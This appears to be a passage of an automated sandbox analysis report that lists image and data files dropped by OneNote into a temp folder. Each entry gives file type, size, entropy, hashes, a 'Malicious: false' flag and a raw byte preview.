Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v....q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

C:\Users\user\AppData\Local\Temp\{2FD46E66-A8DE-40AD-AC53-720FB627E9D0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
Category:	dropped
Size (bytes):	2898
Entropy (8bit):	7.551512280854713
Encrypted:	false
SSDEEP:	48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
MD5:	7C7D9922101488124D2E4666709198AC
SHA1:	00CC44A1B84D4D94A0ACE8834491EB5F65D04619
SHA-256:	20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
SHA-512:	882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................\| F.. ...j...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

C:\Users\user\AppData\Local\Temp\{31CD3F9F-7BA4-4E94-915D-46FD1FA51462}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
Category:	dropped
Size (bytes):	3361
Entropy (8bit):	7.619405839796034
Encrypted:	false
SSDEEP:	96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
MD5:	A994063FF2ABEB78917C5382B2F5FA8C
SHA1:	BD5C4D816B04A2B6596DFE38DB01228F553FACCC
SHA-256:	D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
SHA-512:	CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z\|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3U.7..\|M.x...\|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

C:\Users\user\AppData\Local\Temp\{31CDA264-3DC9-4FE2-9378-C03285DCA913}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 617, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	827
Entropy (8bit):	7.23139555596658
Encrypted:	false
SSDEEP:	12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
MD5:	3E675D61F588462FB452342B14BCF9C0
SHA1:	86B62019BC3C5BE48B654256B5D10293FC8C842A
SHA-256:	639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
SHA-512:	E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
Malicious:	false
Preview:	.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.\|.._...7..D..Ya.l.....{.@&.\|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

C:\Users\user\AppData\Local\Temp\{3229CA3A-663F-476B-9A83-D49A2C06B474}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 650, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	647
Entropy (8bit):	6.854433034679255
Encrypted:	false
SSDEEP:	12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
MD5:	DD876AA103BEC3AC83C769D768AD39FB
SHA1:	1833603AA9B6A7E53F9AD8A336F96CCE33088234
SHA-256:	1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
SHA-512:	946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
Malicious:	false
Preview:	.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....\|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

C:\Users\user\AppData\Local\Temp\{324B4E98-B972-4C36-B25A-8C8872A159E9}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
Category:	dropped
Size (bytes):	11040
Entropy (8bit):	7.929583162638891
Encrypted:	false
SSDEEP:	192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
MD5:	02775A1E41CF53AC771D820003903913
SHA1:	2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
SHA-256:	83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
SHA-512:	5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r\|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m\|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B\|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

C:\Users\user\AppData\Local\Temp\{34ACD608-9ED4-4600-BE9F-7303F40AE4E3}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
Category:	dropped
Size (bytes):	29187
Entropy (8bit):	7.971308326749753
Encrypted:	false
SSDEEP:	768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
MD5:	DF99CAAAB9A7DE97B63343E60A699AB6
SHA1:	B84334135CFB73BC6EF55F85926770D5AC6DFEA8
SHA-256:	74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
SHA-512:	5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;.'.f.5^.....m..<$....8.R.j.D.v..>...dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%..S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..\|D...+...NA....Y.^f.1\|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N......U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

C:\Users\user\AppData\Local\Temp\{34BE1FFC-4CC7-4724-96D7-E0D36FC79C64}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	95763
Entropy (8bit):	7.931689087616878
Encrypted:	false
SSDEEP:	1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
MD5:	177DD42CA99CAA2CCBF2974221680334
SHA1:	35FD86B3DD082A6D4930C67BC0E05D3B5817465A
SHA-256:	525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
SHA-512:	6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=\|..`2. v..t......U.8.u.. ...'...*...2;u....& 3..$.

C:\Users\user\AppData\Local\Temp\{360845C3-43D5-44A9-81F4-1457EA90FAC7}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6504705229104746
Encrypted:	false
SSDEEP:	6:RapYsdllbYyfB3h1RRXUnfYj9TcTBm4RFFBl/FKak0B+BRujlw//0lweI/bjRujd:RapZdlVYyf9/UfYeTrRFFBtD1Wf/W
MD5:	4B86A13A26E917543E789FC75845A1D5
SHA1:	1B00E39F9253ECBFF25FF8D7E58B78B8D5B93104
SHA-256:	82F1217EA1932A460E3B8911E711B753B2B410793B8D1FDBB5991139D7AB88F4
SHA-512:	6CEF22D58DA2C9CFD905B404F14ED42A535C525B4271995DA8D242A92B4AE333CD232B9D5DC1B89BD9E35F32D3763B083A90B4AACF560740A06B64DACFA35C9B
Malicious:	false
Preview:	./.C..vL....W"v_.EO=..eN."...p!j................?.....I...............................................................................................................h.................................................D..VH&2.................E.]..s.=............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{3BABEB0F-E6F1-4EAD-BF38-0D872DC49164}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Temp\{3D5E9502-48E2-46F4-80DC-BEDDE9D85E6D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6476839965721795
Encrypted:	false
SSDEEP:	12:Ra8aJ0tYyf9/UfIXtt/FFBt/ynhPnlUWf/lnl8:Y8aJ0tYyfSQ9t1t/ynlnlUKnl8
MD5:	1467BB5AFBB5A468A6CB6E8CC7A57744
SHA1:	DC9DF7AF58B99D77E2DEBE2D49EAD584992FEE02
SHA-256:	34FD2BF4D4C339C10E0D44254189B81E19E62093EC882B5886E21533F64E97A6
SHA-512:	7407829ABD12E17979007A6DBFC07FA635B6700A8835627765E69572F300942E60C6C846B2918F604E147E055D726A6892B817C6EC8F34D821379E15C1E23D86
Malicious:	false
Preview:	./.C..vL....W"v_..c.3..O..@..A%.................?.....I...............................................................................................................h............................................a....@..=..o...........A2....H..U...N............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{3E514D54-F188-4442-A0EE-7779F6C88CCD}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Temp\{3F64AFE5-8238-4ADA-AF99-9248C7A11722}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{405138B0-4D2C-4E8E-B63A-7E6F923A97D7}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Temp\{40E1C6FA-DBA0-4A69-9198-A13AD0169E06}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Temp\{425363FA-2F36-47B8-BA6E-D85865491C9A}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
Category:	dropped
Size (bytes):	65998
Entropy (8bit):	7.671031449942883
Encrypted:	false
SSDEEP:	1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
MD5:	B4F0A040890EE6F61EF8D9E094893C9C
SHA1:	303BCBA1D777B03BFD99CC01A48E0BB493C93E04
SHA-256:	1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
SHA-512:	8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

C:\Users\user\AppData\Local\Temp\{425A0D32-83E5-48DC-A3A1-FB78E8004704}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
